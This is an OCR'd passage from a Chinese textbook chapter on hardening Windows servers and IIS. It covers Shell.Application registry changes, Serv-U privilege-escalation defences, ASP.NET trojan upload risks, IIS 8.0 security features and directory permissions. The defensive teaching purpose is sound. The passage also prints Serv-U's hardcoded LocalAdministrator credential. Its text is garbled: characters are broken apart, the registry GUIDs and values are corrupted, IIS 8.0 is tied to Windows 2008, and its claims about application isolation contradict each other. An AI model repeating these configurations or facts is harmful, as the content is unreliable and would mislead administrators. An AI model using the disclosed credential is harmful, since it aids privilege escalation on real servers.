[HKEY CLASSES ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\ProgID] 
@="Shell .Application ajiang.1" 


[HKEY CLASSES ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\TypeLib] 
@="{50a7Te9b0-70ef-11d1l-b75a-00a0c90564fe}" 


[HKEY CLASSES ROOT\CLSID\ {13709620-C279-11CE-A49E-444553540001} \Version] 
Er 


[HKEY_CLASSES ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\Version- 
IndependentProgID] 
="Shell .Application ajiang" 


[HKEY_CLASSES ROOT\Shell.Application ajiang] 
@="Shell Automation Service" 


[HKEY CLASSES ROOT\Shell.Application ajiang\CLSID] 
@="{13709620-C279-11CE-A49E-444553540001}" 


[HKEY CLASSES ROOT\Shell.Application ajiang\CurVer] 
@="Shell .Application ajiang.1" 


8.， 防止 列 出 用 户 组 和 系统 进程 


系统 用 户 和 系统 进程 的 列表 可 能 会 被 黑客 利用 , 应 当 隐藏 起 来 , 具体 方法 是 : 选择 “ 开 
一 “程序 ”一 “管理 工具 ”一 “服务 ”命令 ， 找 到 工作 站 ， 停 止 并 禁用 它 。 


9. 防止 Serv-U 权 限 提升 
注销 了 Shell 组 件 之 后 ， 侵 入 者 运行 提升 工具 的 可 能 性 就 很 小 了 ， 但 是 jsp、php、prel 


等 别 的 脚本 语言 也 有 shell 能 力 ， 为 防 万 一 ， 还 是 设置 一 下 为 好 。 


用 Ultraedit 打开 ServUDaemon.exe 查找 ASCII 码 : 用 户 名 为 LocalAdministrator， 密码 





为 “ 雪 @$ak#.Ik;0@P”， 修 改 成 等 长 度 的 其 他 字符 就 可 以 了 ，ServUAdmin.exe 也 可 以 进行 
同样 处 理 。 


全 注意 : 需要 设置 Serv-U 所 在 的 文件 夹 的 权限 ， 不 让 IIS 匿名 用 户 有 读 取 的 权限 ; 否则 被 


人 下 载 修改 过 的 文件 ， 即 可 分 析出 管理 员 名 和 密码 。 


Th.. 
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10. 利用 ASP.NET 漏 洞 攻击 


一 般 情况 下 ， 黑 客 总 是 瞄准 论坛 程序 ， 因 为 这 些 程序 都 有 上 传 功能 ， 很 容易 上 传 
ASP.NET 木马 ， 即 使 设置 了 权限 ， 木 马 也 可 以 控制 当前 站 点 的 所 有 文件 。 另 外 ， 有 了 木马 
后 就 可 以 用 木马 上 传 提升 工具 来 获得 更 高 的 权限 , 关闭 shell 组 件 的 目的 很 大 程度 上 就 是 为 
了 防止 攻击 者 运行 提升 工具 。 

如 果 论 坛 管理 员 关 闭 上 传 功能 ， 黑 客 就 会 想 办 法 获得 超级 管理 员 密码 ， 如 使 用 某 个 网 
络 论坛 并 且 为 数据 库 改名 ， 黑客 就 可 以 直接 下 载 数 据 库 ， 下 一 步 就 是 找到 论坛 管理 员 密 
码 了 。 

作为 管理 员 ， 首 先 要 检查 关键 的 ASP.NET 程序 ， 做 好 必要 的 设置 ， 防 止 网 站 被 黑客 
进入 。 另 外 ， 就 是 防止 攻击 者 使 用 一 个 被 黑客 侵入 的 网 站 来 控制 整个 服务 器 ， 如 果 服 务 器 
上 还 为 别人 开 了 站 点 链接 ， 就 可 能 无 法 确定 别人 是 否 将 其 上 传 的 论坛 进行 安全 设置 。 所 以 
配置 安全 的 操作 系统 是 非常 有 必要 的 。 














14.2 ”安全 配置 IIS 


由 于 Web 服务 器 被 越 来 越 多 的 黑客 和 蠕虫 制造 者 作为 首要 攻击 目标 ，IIS 也 就 成 为 了 
Microsoft 可 信赖 计算 计划 中 首要 关注 的 内 容 。 因 此 ，IIS 8.0 需要 被 重新 设计 ， 以 实现 默认 
安全 和 设计 安全 。 本 节 主 要 讲述 了 IS 8.0 在 默认 设置 和 安全 性 设计 上 的 改变 如 何 使 其 成 为 
关键 Web 应 用 的 平台 。 


1. lIS 概 述 


IIS(Intemet Information Server) 是 微软 公司 主推 的 服务 器 ,最 新 的 版 本 是 Windows 2008 
里 面包 含 的 IS 8.0，IIS 与 Window Server 集成 在 一 起 ， 用 户 能 够 利用 Windows Server 和 
NTFS (NT File System, NT 的 文件 系统 ) 内 置 的 安全 特性 , 建立 强大 、 灵活 而 安全 的 Intermet 
和 Intranet 站 点 。 

IIS 支持 超 文本 传输 协议 (Hypertext Transfer Protocol，HTTP)、 文 件 传 输 协议 File 
Transfer Protocol, FTP) 以 及 SMTP 协议 , 通过 使 用 CGI 和 ISAPI, IIS 可 以 得 到 高 度 扩展 。 

IIS 支持 与 语言 无 关 的 脚本 编写 和 组 件 ， 通 过 IS 开发 人 员 可 以 开发 新 一 代 动 态 Web 
站 点 。IIS 不 需要 开发 人 员 学 习 新 的 脚本 语言 或 者 编译 应 用 程序 , 完全 支持 VBScript, JScript 
开发 软件 以 及 Java， 也 支持 CGI 和 WinCGI， 以 及 ISAPI 扩展 和 过 滤器 。 

IIS 的 设计 目的 是 建立 一 套 集成 的 服务 器 服务 ， 用 以 支持 HTTP，FTP 和 SMTP 协议 ， 
快速 集成 了 现 有 产品 ， 同 时 可 以 扩展 Internet 服务 器 。 

IS 安全 性 能 极 高 ， 同 时 系统 资源 的 消耗 也 很 少 ,IIS 的 安装 、 管理 和 配置 都 相当 简单 ， 
IIS 与 Windows Server 网 络 操作 系统 是 紧密 的 集成 在 一 起 ， 还 使 用 与 Windows Server 相同 
的 安全 性 账号 管理 器 (Security Accounts Manager，SAM) ， 对 于 管理 员 来 说 ，IIS 使 用 诸 
如 性 能 监控 和 简单 网 络 管理 协议 (Simple Nerwork Management Protocol，SNMP) 之 类 的 已 
有 管理 工具 使 得 管理 更 加 简单 ， 也 更 加 安全 。 

IIS 支持 ISAPI, 使 用 ISAPI 可 以 扩展 服务 器 功能 ， 而 使 用 ISAPI 过 滤器 可 以 预先 处 理 


a 
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储存 在 IS 上 的 数据 。 用 于 32 位 Windows 应 用 程序 的 Intemet 扩展 可 以 把 FTP，SMTP 和 
HTTP 协议 置 于 容易 使 用 且 任 务 集 中 的 界面 中 , 这 些 界面 将 Internet 应 用 程序 的 使 用 大 大 简 
化 。 同 时 ,IIS 也 支持 多 用 于 Intemet 邮件 扩展 (Multipurpose Internet Mail Extensions, MIME )， 
可 以 为 Intemet 应 用 程序 的 访问 提供 一 个 简单 的 注册 项 。 


2. lIS 8.0 的 重要 特性 


IIS 8.0 相 比 IS 7.0 有 了 重大 的 提高 和 改进 ， 具 有 很 多 优秀 的 特性 : 

(1) IS 8.0 可 以 将 单个 的 Web 应 用 程序 或 多 个 站 点 分 隔 到 独立 的 进程 ( 称 为 应 用 程序 
池 ) 。 应 用 程序 池 以 独立 进程 的 方式 运行 极 大 的 提高 了 Web 服务 器 的 安全 和 稳定 性 。 该 进 
程 与 操作 系统 内 核 直 接 通 信 ， 当 在 服务 器 上 提供 更 多 的 活动 空间 时 ， 此 功能 将 增加 吞吐 量 
和 应 用 程序 的 容量 ， 从 而 有 效 地 降低 硬件 需求 。 这 些 独 立 的 应 用 程序 池 将 阻止 某 个 应 用 程 
序 或 站 点 破坏 服务 器 上 的 XML Web 服务 或 其 他 Web 应 用 程序 。 

(2)IS 8.0 提 供 了 状态 监视 功能 ,用 来 发 现 \ 恢 复 和 防止 Web 应 用 程序 故障 .在 Windows 
Server 2008 上 ，ASP.NET 在 本 地 使 用 新 的 IS 进程 模型 。 

(3) Microsoft.NET 框架 是 用 于 生成 、 部 署 和 运行 Web 应 用 程序 、 智 能 客户 应 用 程序 
和 XML Web 服务 的 Microsoft .NET 连接 的 软件 和 技术 的 编程 模型 ， 这 些 应 用 程序 和 服务 
使 用 标准 协议 (如 SOAP、XML 和 HTTP) 在 网 络 上 以 编程 的 方式 公开 它们 的 功能 。.NET 
框架 为 将 现 有 的 投资 与 新 一 代 应 用 程序 和 服务 集成 提供 了 高 效率 的 标准 环境 。 

(4) IIS 8.0 提供 连接 并 发 数 网 络 流量 等 监控 ， 可 以 使 不 同 网 站 完全 独立 ， 不 会 因为 某 
一 个 网 站 的 问题 而 影响 到 其 他 网 站 。 

(5) IIS 8.0 提供 了 更 好 的 安全 性 ， 通 过 分 离 运行 用 户 和 系统 用 户 的 方式 实现 。IS 服务 
运行 权限 和 Web 应 用 程序 权限 分 开 ， 保 证 Web 应 用 足够 安全 ， 这 些 是 其 他 Web 服务 器 所 
欠缺 的 。 

3. 默认 安全 

类 似 微软 公司 这 样 的 企业 都 会 在 他 们 的 Web 服务 器 上 安装 一 系列 的 默认 示例 脚本 , 授 
予 文件 处 理 和 最 小 权限 ， 以 提高 管理 员 管 理 的 灵活 性 和 可 用 性 。 但 是 ， 这 些 默认 设置 都 增 
加 了 IS 的 被 攻击 面 , 或 者 成 为 了 攻击 IIS 的 基础 。 因此 , IS 8.0 被 设计 得 比 早 期 更 加 安全 ， 
最 显而易见 的 变化 是 IIS 8.0 并 没有 在 Windows Server 2008 默认 进行 安装 ， 而 是 需要 管理 
员 显 式 安 装 。 其 他 的 变化 包括 : 

1) 默认 只 安装 静态 HTTP 服务 器 

IIS 8.0 默认 安装 设置 为 仅 安装 静态 HTML 页 面 显示 所 需 的 组 件 ， 而 不 允许 动态 内 容 。 

2) 默认 不 安装 应 用 范例 

IS 8.0 中 不 再 包括 任何 类 似 showcode.asp 或 codebrws.asp 等 的 范例 脚本 或 应 用 。 这 些 
程序 原本 用 来 快速 察看 和 调试 数据 库 的 连接 代码 ， 但 是 由 于 showcode.asp 和 codebrws.asp 
没有 正确 的 进行 输入 检查 ， 这 就 允许 攻击 者 绕 过 它 去 读 取 系统 中 的 任何 一 个 文件 (包括 敏 
感 信息 和 本 应 不 可 见 的 配置 文件 )。 

3) 增强 的 文件 访问 控制 

匿名 账号 不 再 具有 Web 服务 器 根 目录 的 写 权 限 。 另 外, FTP 用 户 也 被 相互 隔离 在 他 们 
自己 的 根 目录 中 ， 这 些 限制 有 效 的 避免 了 用 户 向 服务 器 文件 系统 的 其 他 部 分 上 传 一 些 有 害 
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程序 。 

4) 虚拟 目录 不 再 具有 执行 权限 

虚拟 目录 中 不 再 允许 执行 可 执行 程序 。 这 样 避 免 了 大 量 的 存在 于 早期 IS 系统 中 的 目 
录 遍 历 漏洞 、 上 传代 码 漏洞 以 及 MDAC 漏洞 。 

5) 去 掉 ISSUBA.dll 子 验证 模块 

IIS 8.0 中 去 除了 HSSUBA.dll。 任 何在 早期 IS 版 本 中 ， 需 要 该 dll 模块 来 验证 账号 ， 
现在 需要 具有 “从 网 络 上 访问 这 台 计 算 机 ”的 权限 。dll 模块 的 去 除 强制 要 求 所 有 的 访问 都 
直接 去 SAM 或 者 活动 目录 进行 身份 验证 ， 从 而 减少 IIS 可 能 被 攻击 的 情况 。 

6) 父 目 录 被 禁用 

IS 8.0 中 默认 禁用 对 父 目 录 的 访问 , 可 以 避免 攻击 者 跨越 Web 站 点 的 目录 结构 访问 服 
务 器 上 的 其 他 敏感 文件 ， 如 SAM 文件 等 。 父 目录 默认 被 禁用 可 能 导致 一 些 从 早期 版 本 IIS 
上 迁移 过 来 的 应 用 由 于 无 法 使 用 父 目 录 而 出 错 。 


4. 设计 安全 


IIS 8.0 设计 安全 的 根本 改进 表现 在 ， 数据 有 效 性 的 改善 、 日 志 功 能 的 增强 、 快 速 失败 
保护 、 应 用 程序 隔离 和 最 小 权限 原则 。 


5. 数据 有 效 性 的 改善 


IS 8.0 设计 的 一 个 主要 新 特性 是 工作 在 内 核 模式 的 HTTP 驱动 一 HTTP.sys， 它 不 仅 
提高 了 Web 服务 器 的 性 能 和 可 伸缩 性 , 而 且 极 大 程度 的 加 强 了 服务 器 的 安全 性 。HTTP.sys 
作为 Web 服务 器 的 门户 ， 首 先 解析 用 户 对 Web 服务 器 的 请 求 ， 然 后 指派 一 个 合适 的 用 户 
级 工作 进程 来 处 理 请 求 ,工作 进程 被 限制 在 用 户 模式 以 避免 它 访问 未 授权 的 系统 核心 资源 
从 而 极 大 地 限制 了 攻击 者 对 服务 器 保护 资源 的 访问 。 

IIS 8.0 通过 在 内 核 模式 的 驱动 中 整合 一 系列 的 安全 机 制 提升 其 设计 上 固有 的 安全 性 。 
这 些 机 制 包括 避免 潜在 的 缓冲 溢出 ， 改 善 的 日 志 机 制 以 辅助 事件 响应 进程 和 检查 用 户 有 效 
性 请 求 的 先进 URL 解析 机 制 。 

为 了 避免 潜在 的 缓冲 区 和 内 存 溢出 漏洞 被 利用 ， 通 过 在 HTTP.sys 中 进行 特殊 的 URL 
解析 设置 来 实现 ITS 8.0 安全 设计 中 的 深度 防御 原则 , 这 些 设置 还 可 以 通过 修改 注册 表 中 特 
定 的 键 值 来 进一步 优化 。 


6. 增强 的 日 志 机 制 


一 个 全 面 的 日 志 是 检测 或 响应 一 个 安全 事故 的 基础 要 求 。 微 软 公司 也 意识 到 在 
HTTP.sys 中 进行 全 面 的 、 可 靠 的 日 志 机 制 的 重要 性 。HTTP.sys 在 将 请 求 指派 给 特定 的 工 
作 进程 之 前 就 进行 日 志 记 录 ， 可 以 保证 即使 工作 进程 中 断 也 会 保留 错误 日 志 。 

日 志 由 发 生 错误 的 时 间 惟 、 来 源 全、 目的 了 、 来 源 端 口 、 目 的 端口 、 协 议 版 本 、HTTP 
动作 、URL 地 址 、 协 议 状 态 、 站 点 ID 和 HTTP.sys 的 原因 解释 等 条 目 构 成 。 原 因 解 释 能 够 
提供 详细 的 错误 产生 原因 的 信息 ， 如 由 于 超时 导致 的 错误 ， 或 由 于 工作 进程 的 异常 终止 而 
引发 的 应 用 程序 池 强 行 切断 连接 而 导致 的 错误 等 。 
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7. 快速 失败 保护 


除了 修改 注册 表 之 外 ，IIS 8.0 的 管理 员 还 可 以 通过 服务 器 设置 ， 使 那些 在 一 段 时 间 内 
反复 失败 的 进程 关闭 或 重新 运行 。 这 个 附加 的 保护 措施 是 为 了 防止 应 用 程序 因为 受到 攻击 
而 不 断 出 错 ， 这 个 特性 叫做 快速 失败 保护 。 

快速 失败 保护 可 以 按照 以 下 步骤 在 Internet 信息 服务 管理 工具 中 配置 : 

(1) 在 Intemet 信息 服务 (IIS) 管理 器 中 ， 展 开本 地 计算 机 。 

(2) 展开 应 用 程序 池 选 项 。 

(3) 在 要 设 定 快速 失败 保护 的 应 用 程序 池上 右 击 。 

(4) 选择 属性 。 

(5) 选择 运行 状况 选项 卡 , “启用 快速 失败 保护 ”按钮 。 

(6) 在 失败 数 中 ， 填 写 可 以 忍受 的 工作 进程 失败 次 数 〈 在 结束 这 个 进程 之 前 ) ， 在 时 
间 段 中 则 填写 累计 工作 进程 失败 次 数 统计 的 时 间 。 


8. 应 用 程序 隔离 


在 IS 8.0 及 以 下 版 本 中 没有 实现 应 用 程序 隔离 ， 因 为 将 Web 应 用 程序 隔离 在 独立 的 
单元 将 会 导致 严重 的 性 能 下 降 。 通 常 一 个 Web 应 用 程序 的 失败 会 影响 同一 服务 器 上 其 他 应 
用 程序 。 然 而 ，IS 8.0 在 处 理 请 求 时 ， 通 过 将 应 用 程序 隔离 成 一 个 个 应 用 程序 池 的 孤立 单 
元 ， 成 倍 的 提高 了 性 能 。 每 个 应 用 程序 池 中 通常 由 一 个 或 多 个 工作 进程 组 成 ， 这 样 就 允许 
确定 错误 的 位 置 ， 防 止 一 个 工作 进程 影响 其 他 工作 进程 。 这 种 机 制 也 提高 了 服务 器 以 及 运 
行 在 其 上 应 用 的 可 靠 性 。 


9. 坚持 最 小 特权 原则 


IS 8.0 坚持 一 个 基本 安全 原则 一 一 最 小 特权 原则 。 也 就 是 说 ，HTTP.sys 中 所 有 代码 都 
是 以 Local System 权限 执行 的 ， 而 所 有 的 工作 进程 都 是 以 Network Service 的 权限 执行 的 。 
Network Service 是 Windows 2008 中 新 内 置 的 一 个 被 严格 限制 的 账号 。 

另外 ，IIS 8.0 只 允许 管理 员 执行 命令 行 工具 ， 从 而 避免 命令 行 工具 的 恶意 使 用 。 这 些 
设计 上 的 改变 ， 都 降低 了 通过 潜在 的 漏洞 攻击 服务 器 的 可 能 性 。 基 础 设计 上 的 改变 、 简 单 
配置 的 更 改 〈 包 括 取 消 匿 名 用 户 向 Web 服务 器 的 根 目录 写 入 权限 ， 将 FTP 用 户 的 访问 隔 
离 在 他 们 各 自 的 主 目录 中 ) 都 极 大 地 提高 了 IIS 8.0 的 安全 性 。 

IIS 8.0 是 微软 公司 在 帮助 客户 提高 安全 性 上 迈 出 的 一 大 步 , 为 Web 应 用 提供 了 一 个 可 
靠 、 安 全 的 平台 。 这 些 安全 性 的 提高 应 归功 于 IIS 默认 的 安全 设置 ， 在 设计 过 程 中 就 对 安 
全 性 的 着 重 考虑 ， 增 强 了 监视 与 日 志 功能 。 

管理 员 不 应 该 认为 仅仅 通过 简单 的 迁移 到 新 平台 就 可 以 获得 全 面 的 安全 。 正 确 的 做 法 
是 进行 多 层面 的 安全 设置 ， 从 而 获得 更 全 面 的 安全 性 。 这 也 与 针对 Code Red 和 Nimda 病 
毒 威胁 而 进行 的 深度 安全 防御 原则 是 一 致 的 。 


























14.3 使 用 IIS 


通常 , 部署 Web 应 用 程序 的 第 一 个 任务 是 要 确定 没有 公开 匿名 用 户 端 能 透 过 网 络 存 取 
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的 敏感 性 资源 。 如 果 是 内 部 网 络 应 用 程序 ， 要 确定 所 有 客户 端 进行 Windows 验证 ， 并 且 设 
置 防火 墙 来 保护 应 用 程序 ， 使 之 无 法 从 外 部 存 取 。 

对 互联 网 应 用 程序 而 言 ， 这 个 问题 比较 麻烦 ， 因 为 它们 至 少 得 允许 匿名 的 互联 网 使 用 
者 能 够 进行 程序 存 取 。 除 了 这 个 差异 之 外 ， 无 论 是 互联 网 或 是 内 部 网 络 的 应 用 程序 ， 都 能 
使 用 特定 准则 来 保护 Web 资源 。 

在 理想 的 情况 下 , 要 确定 应 用 程序 的 Web 命名 空间 里 不 包含 任何 不 打算 给 客户 端 使 用 
的 文件 。 也 就 是 说 ，IIS 中 标示 为 Web 应 用 程序 或 是 虚拟 目录 的 最 顶层 目录 开始 ， 将 这 种 
文件 从 实际 目录 结构 里 全 部 移 除 。 如果 文件 不 位 于 Web 命名 空间 里 , 则 让 应 用 程序 直接 开 
启 或 是 提供 其 内 容 ， 其 他 由 命名 空间 提出 要 求 的 存 取 都 不 允许 。 

假如 无 法 移动 私密 文件 ， 切 记 要 把 IIS 设 定 为 不 将 这 些 文件 提供 给 Web 客户 端 。 只 要 
在 IIS 里 处 理 映 射 关系 ， 将 受 保护 文件 的 副本 对 应 到 ASP.NET， 应 用 程序 或 目录 就 会 将 这 
些 副 本 文件 名 对 应 到 禁止 访问 处 理 模 块 HttpForbiddenHandler。 

在 预 设 的 情况 下 ，ASPNET 会 对 一 些 常见 Web 程序 副本 类 型 进行 存 取 ， 其 中 包 
括 .cs、Jjava、.mdb、.mdf、.vb 等 。 
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图 14-1 副本 映射 





图 14-1 将 XML 后 级 的 文件 映射 到 ASP.NET ISAPI 中 。 接 下 来 ， 设 置 web.config， 设 
置 的 代码 如 下 : 


<configuration> 
<system.web> 


<httpHandlers> 
<add path="*.xml" verb="*" 
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type="System.Web.HttpForbiddenHandler" /> 
</httpHandlers> 
</system.web> 
</configuration> 
需要 注意 的 是 , 阻止 映射 会 产生 一 个 403 Forbidden 错误 页 , 它 传递 了 公文 是 否 存 在 的 
信息 。 为 迷惑 黑客 可 以 改 用 System.Web.HttpNotFoundHandler， 产 生 一 个 404 错误 信息 ， 
这 样 就 不 会 透露 该 文档 是 否 存 在 了 。 





14.4 IIS 安全 设置 


作为 系统 管理 员 ， 如 果 不 会 设置 Web 服务 器 的 权限 ， 很 容易 出 现 漏 洞 ， 被 黑客 利用 。 
下 面 是 笔者 在 配置 过 程 中 总 结 的 一 些 经 验 ， 希 望 对 读者 有 所 帮助 。 

IIS Web 服务 器 的 权限 设置 有 两 种 : 一 个 是 NTFS 文件 系统 本 身 的 权限 设置 ， 另 一 个 
是 在 IS 下 选择 “站 点 ”一 “属性 ”一 “ 主 目录 ”， 然 后 主 目录 的 窗 体 上 进行 权限 设置 。 
这 两 者 是 密切 相关 的 ， 下 面 的 实例 讲解 如 何 设 置 权限 ， 有 具体 步骤 如 下 : 

开启 IS 8.0 并 且 依 次 打开 : 在 IIS 下 选择 “站 点 ”一 “属性 ”一 “ 主 目录 ”， 面 板 上 
有 脚本 资源 访问 、 读 取 、 写 入 、 浏 览 、 记 录 访 问 和 索引 资源 选项 。 

在 6 个 选项 中 ，“ 记 录 访 问 ” 和 “索引 资源 ” 跟 安 全 性 关系 不 大 ， 默 认 都 会 设置 。 但 
是 如 果 前 面 4 个 权限 都 没有 设置 的 话 ， 这 两 个 权限 也 没有 必要 设置 。 在 设置 权限 时 ， 记 住 
这 个 规则 即 可 ， 后 面 的 例子 中 不 再 特别 说 明 。 在 这 6 个 选项 下 面 的 执行 权限 下 拉 列 表 中 包 
含 选 项 : 无 、 纯 脚本 、 纯 脚本 和 可 执行 程序 。 

如 果 网 站 目录 在 NTFS 分 区 〈 推 荐 用 这 种 ) 的话， 还 需要 对 NTFS 分 区 上 的 这 个 目录 
设置 相应 权限 ， 许 多 地 方 都 介绍 设置 everyone 的 权限 ， 实 际 上 这 并 不 是 最 优 方案 ， 其 实 只 
要 设置 Internet Guest 账号 (IUSR _xxxxxxx) 或 IS_WPG 组 的 账号 权限 就 可 以 了 。 

如 果 设 置 的 是 ASP、PHP 程序 的 目录 权限 ， 那 么 就 要 设置 Intemet Guest 账号 的 权限 ， 
而 对 于 ASP.NET 程序 ， 则 需要 设置 IS_WPG 组 的 账号 权限 。 

在 后 面 提 到 NTFS 权限 设置 时 会 明确 指出 ， 如 果 没 有 明确 指出 设置 什么 类 型 的 权限 ， 
则 一 律 设置 IS 属性 面板 上 的 权限 。 下 面 的 4 个 例子 将 告诉 读者 设置 权限 的 具体 做 法 。 


1. ASP、PHP、ASP.NET 程 序 所 在 目录 的 权限 设置 


如 果 需 要 执行 这 些 程序 ， 需 要 设置 “ 读 取 ” 权 限 ， 并 且 设 置 执行 权限 为 “ 纯 脚 本 ”。 
需要 注意 的 是 ， 不 要 设置 “ 写 入 ”和 “脚本 资源 访问 ”， 更 不 要 设置 执行 权限 为 “ 纯 脚 本 
和 可 执行 程序 ”。 

NTFS 权限 不 能 给 IS_WPG 用 户 组 和 Internet Guest 账号 设置 写 和 修改 权限 。 如 果 有 一 
些 文件 需要 特殊 配置 (而 且 配 置 文件 本 身 也 是 ASP、PHP 程序 ) ， 则 需要 给 这 些 特定 的 文 
件 配置 NTFS 权限 中 的 Internet Guest 账号 (ASP.NET 程序 是 IS_WPG 组 ) 的 写 权 限 ， 而 
不 是 IS 属性 面板 中 的 写 权 限 。 

IIS 面板 中 的 写 权 限 实 际 上 是 对 HTTP PUT 指令 的 处 理 ， 对 于 普通 网 站 来 说 ， 这 个 权 
限 是 不 打开 的 。 

这 样 做 的 原因 在 于 ，IS 面板 中 的 “脚本 资源 访问 ”不 是 指 可 以 执行 脚本 的 权限 ， 而 是 
指 可 以 访问 源 代码 的 权限 ， 如 果 同 时 打开 写 权限 的 话 ， 那 么 就 非常 危险 了 。 执 行 权 限 中 ， 
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“ 纯 脚 本 和 可 执行 程序 ”权限 可 以 执行 任意 程序 ,包括 exe 可 执行 程序 ， 如 果 目 录 同 时 有 写 
权限 的 话 ， 那 么 就 很 容易 上 传 并 执行 木马 程序 了 。 

许多 人 喜欢 在 文件 系统 中 把 ASPNET 程序 的 目录 设置 成 Web 共享 ， 实 际 上 这 是 没有 
必要 的 , 只 需要 在 IS 中 保证 该 目录 为 一 个 应 用 程序 目录 即 可 。 如 果 所 在 目录 在 IS 中 不 是 
一 个 应 用 程序 目录 ， 只 需要 在 其 属性 一 目录 面板 中 应 用 程序 设置 部 分 点 创建 即 可 。Web 共 
享 会 给 其 更 多 权限 ， 这 样 会 造成 更 多 的 不 安全 因素 。 


2. 上传 目录 的 权限 设置 


用 户 的 网 站 上 可 能 会 设置 一 个 或 几 个 目录 允许 上 传 文件 ,上 传 的 方式 一 般 是 通过 ASP、 
PHP、ASP.NET 等 程序 来 完成 。 这 时 需要 注意 ， 一 定 要 将 上 传 目 录 的 执行 权限 设 为 “无 ”， 
这 样 即使 上 传 了 ASP、PHP 等 脚本 程序 或 exe 程序 ， 也 不 会 在 用 户 浏览 器 里 触发 执行 。 
同样 ， 如 果 不 需要 用 户 用 PUT 指令 上 传 ， 那么 就 不 要 设置 该 上 传 目录 的 写 权 限 ， 应 该 
设置 NTFS 权限 中 的 Intemet Guest 账号 (ASPNET 程序 的 上 传 目录 是 IS_WPG 组 ) 的 写 
权限 。 

如 果 下 载 通 过 程序 读 取 文 件 内 容 然 后 再 转发 给 用 户 的 话 ， 那 么 连 读 取 权限 也 不 要 设 
置 。 这 样 可 以 保证 用 户 上 传 的 文件 只 能 被 程序 中 已 授权 的 用 户 下 载 ， 而 不 是 知道 文件 存放 
目录 的 用 户 。 浏 览 权 限 也 不 要 打开 ， 除 非 希 望 用 户 可 以 浏览 你 的 上 传 目录 ， 并 可 以 选择 自 
己 想 要 下 载 的 东西 。 

一 般 来 说 ，ASP、PHP 等 程序 都 有 一 个 上 传 目录 ， 它 们 继承 了 上 面 的 属性 ， 可 以 运行 
脚本 。 我 们 应 该 将 这 些 目录 重新 设置 属性 ， 将 “ 纯 脚本 ”选项 改 成 “无 ”选项 。 


3. Access 数 据 库 所 在 目录 的 权限 设置 


许多 IIS 用 户 常常 采用 将 Access 数据 库 改 名 〈 改 为 asp 或 aspx 后 级 等 ) 或 将 数据 库 放 
在 发 布 目录 之 外 的 方法 来 避免 浏览 者 下 载 Access 数据 库 。 

其 实 ， 只 需要 将 Access 所 在 目录 (或 该 文件 ) 的 读 、 写 权限 都 去 掉 就 可 以 防止 被 人 下 
载 或 算 改 了 。 不必 担 心 这 样 会 使 程序 无 法 读 取 和 写 入 Access 数据 库 。 一 般 来 说 ,程序 需要 
的 仅仅 是 NTFS 上 Intemet Guest 账号 或 IS_WPG 组 账号 的 权限 ， 所 以 只 需 将 这 些 用 户 的 
权限 设置 为 可 读 可 写 就 完全 可 以 保证 程序 的 正确 运行 。 如 果 保 证 Intemet Guest 账号 或 
IIS_WPG 组 账号 具有 读 写 权限 ， 就 可 以 把 Access 所 在 目录 (或 该 文件 ) 的 读 、 写 权限 都 
去 掉 ， 防 止 被 人 下 载 或 算 改 。 


4. 其 他 目录 的 权限 设置 


一 般 网 站 中 除了 上 述 的 各 种 目录 外 ， 可 能 还 有 纯 图 片 目 录 、 纯 html 模板 目录 、 纯 客户 
端 js 文件 目录 或 者 样式 表 目 录 等 ， 这 些 目 录 只 需要 设置 读 权限 即 可 ， 并 且 把 执行 权限 设 成 
“无 ”， 其 他 权限 一 概 不 需要 设置 。 








14.4.1 角色 设置 


IIS 8.0 的 角色 为 管理 用 户 组 的 访问 规则 提供 了 一 种 便捷 的 方法 。 创 建 用 户 后 ， 可 以 将 
他 们 分 配给 角色 (在 Windows 中 是 将 用 户 分 配给 组 ) 。 例 如 ， 可 以 创建 一 组 页 面 ， 然 后 将 
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其 访问 权限 限制 于 某 些 特定 的 用 户 ， 并 由 用 户 将 这 些 页 面 存储 在 文件 夹 中 ， 之 后 可 以 使 用 
IIS 8.0 定义 允许 和 拒绝 访问 该 受 限 文件 夹 的 规则 。 如 果 未 被 授权 的 用 户 尝 试 查看 受 限制 的 
页 面 ， 该 用 户 会 看 到 错误 消息 或 被 重 定向 到 指定 页 面 。 


全 注意 ; 访问 站 点 、 应 用 程序 或 文件 的 匿名 用 户 不 能 分 配角 色 。 





1. 添加 .NET 角 色 的 步骤 


(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “.NET 角色 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 添 加 ”按钮 。 

(4) 在 “添加 .NET 角色 ”对 话 框 中 的 “名 称 ”文本 框 中 ， 输 入 角色 的 名 称 ， 然 后 单 击 


2. 禁用 .NET 角 色 的 步骤 


如 果 不 需 要 向 特定 的 用 户 组 应 用 安全 设置 ， 可 以 禁用 相应 的 角色 。 
(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “.NET 角色 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 禁 用 ”按钮 。 

3. 启用 .NET 角 色 的 步骤 

车 要 轻松 地 对 用 户 进行 分 组 ， 并 向 用 户 组 应 用 安全 设置 ， 可 以 启用 角色 。 
(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “.NET 角色 ”项 。 

(3) 在 “操作 ” 窗 格 中 ， 单 击 “ 启 用 ”按钮 。 

4. 删除 .NET 角 色 的 步骤 

如 果 不 再 需要 为 特定 的 组 应 用 安全 设置 ， 则 可 以 删除 这 些 角色 。 
(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “NET 角色 ”项 。 

(3) 选择 要 删除 的 角色 。 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 删 除 ”按钮 。 

5. 重 命名 .NET 角 色 的 步骤 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “NET 角色 ”项 。 

(3) 选择 要 重 命名 的 角色 。 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 重 命名 ”按钮 。 

6. 为 .NET 角 色 选 择 默认 提供 程序 


IS 8.0 包括 以 下 用 于 角色 的 默认 提供 程序 : 


。264 。 
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口 SQL Server (AspNetSqlRoleProvider) 角色 信息 存储 在 SQL Server 数据 库 中 。SQL 

